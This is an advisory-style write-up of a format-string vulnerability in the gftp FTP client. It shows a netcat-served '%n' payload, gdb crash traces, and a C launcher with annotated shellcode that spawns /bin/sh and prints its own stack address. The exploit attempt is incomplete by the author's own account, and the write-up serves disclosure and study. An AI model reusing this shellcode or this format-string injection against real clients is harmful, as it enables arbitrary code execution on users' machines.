COMMAND

    gftpd

SYSTEMS AFFECTED

    gftpd

PROBLEM

    Here are some of the other ways of playing with gftp that the
    SRTeam of snosoft.com have been experimenting with.

    Here are some ideas... data can u help out...

        (root)>./execve
        shellcode addy: 0xbffff848
        Ctrl-C

        (root)>echo -e "\x48\xf8\xff\xbf"
        Høÿ¿

        %n writes data to the current frame; see the example...
        (root)>echo -e "AAAA%n" > file

        (root)>nc -l -p 21 < file
        Program received signal SIGSEGV, Segmentation fault.
        0x40325dd7 in vfprintf () from /lib/libc.so.6
        (gdb) bt
        #0  0x40325dd7 in vfprintf () from /lib/libc.so.6
        #1  0x40332bbc in vsprintf () from /lib/libc.so.6
        #2  0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
        #3  0x8111248 in ?? ()
        Cannot access memory at address 0x41414141

    Sooooooooo, knowing that we control the EIP, let's try to point it
    at some shellcode.

        (root)>echo -e "\x48\xf8\xff\xbf%n" > file

        (root)>nc -l -p 21 < file

        (gdb) run ftp://localhost
        The program being debugged has been started already.
        Start it from the beginning? (y or n) y
        Starting program: /usr/bin/gftp ftp://localhost
        warning: Unable to find dynamic linker breakpoint function.
        Program received signal SIG32, Real-time event 32.
        0x4030617e in sigsuspend () from /lib/libc.so.6
        (gdb) c
        Continuing.

        Program received signal SIGSEGV, Segmentation fault.
        0x40325dd7 in vfprintf () from /lib/libc.so.6
        (gdb) bt
        #0  0x40325dd7 in vfprintf () from /lib/libc.so.6
        #1  0x40332bbc in vsprintf () from /lib/libc.so.6
        #2  0x401ae8d2 in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
        #3  0x403c8010 in __morecore () from /lib/libc.so.6
        #4  0x80beaf8 in ?? ()
        #5  0xbffffa31 in ?? ()
        #6  0x6e69622f in ?? ()
        Cannot access memory at address 0x7273752f
        (gdb) Quit

    This is definitely not the proper approach to this...

    (root)>cat >
    execve.c
    /*
     * execve.c as listed in the advisory: a small launcher that prints the
     * address of a stack buffer holding machine code and then replaces
     * itself with gftp.  The transcript above reads the printed address back
     * and embeds it in the text served on port 21.  What the transcript
     * appears to show (backtrace through g_strdup_vprintf -> vsprintf on
     * "AAAA%n" served by nc) is server-supplied text reaching a printf-style
     * function as the format argument; that unchecked format string in the
     * client is the defect, this file is only the advisory's demonstration.
     *
     * Code-quality notes, left unfixed so the listing stays byte-identical:
     *  - main() has no return type and no headers are included, so printf,
     *    execl and exit rely on pre-C99 implicit declarations;
     *  - "%x" is given a char * (should be "%p" for a pointer);
     *  - the execl argument list is terminated by a bare 0 rather than
     *    (char *)0 / NULL;
     *  - the printed address is only meaningful if the exec'd process ends
     *    up with the same stack layout -- address-space randomization is
     *    exactly the mitigation that breaks that assumption.
     */
    main()
    {
    /* Raw machine code; the comments alongside are the author's own
     * annotation of each instruction (setregid(12,12), then execve). */
    char hell[] =
    /* main: */                            /* setregid(12, 12);        */
    "\x29\xc0"                             /* subl %eax, %eax          */
    "\xb0\x47"                             /* movb $71, %al            */
    "\x29\xdb"                             /* subl %ebx, %ebx          */
    "\xb3\x0c"                             /* movb $12, %bl            */
    "\x89\xd9"                             /* movl %ebx, %ecx          */
    "\xcd\x80"                             /* int $0x80                */
    "\xeb\x18"                             /* jmp callz                */
    "\x5e"                                 /* popl %esi                */
    "\x29\xc0"                             /* subl %eax, %eax          */
    "\x88\x46\x07"                         /* movb %al, 0x07(%esi)     */
    "\x89\x46\x0c"                         /* movl %eax, 0x0c(%esi)    */
    "\x89\x76\x08"                         /* movl %esi, 0x08(%esi)    */
    "\xb0\x0b"                             /* movb $0x0b, %al          */
    "\x87\xf3"                             /* xchgl %esi, %ebx         */
    "\x8d\x4b\x08"                         /* leal 0x08(%ebx), %ecx    */
    "\x8d\x53\x0c"                         /* leal 0x0c(%ebx), %edx    */
    "\xcd\x80"                             /* int $0x80                */
    "\xe8\xe3\xff\xff\xff"                 /* call start               */
    "\x2f\x62\x69\x6e\x2f\x73\x68";        /* ASCII "/bin/sh"          */


    /* Address of the buffer on this process's stack (see the "%x" note above). */
    printf("shellcode addy: 0x%x\n", hell);

    /* Replace the process image with gftp pointed at the local listener;
     * exit(0) is only reached if execl fails. */
    execl("/usr/bin/gftp", "gftp", "ftp://localhost", 0);
    exit(0);
    }

SOLUTION

    See:

        http://oliver.efri.hr/~crv/security/bugs/Others/gftpd2.html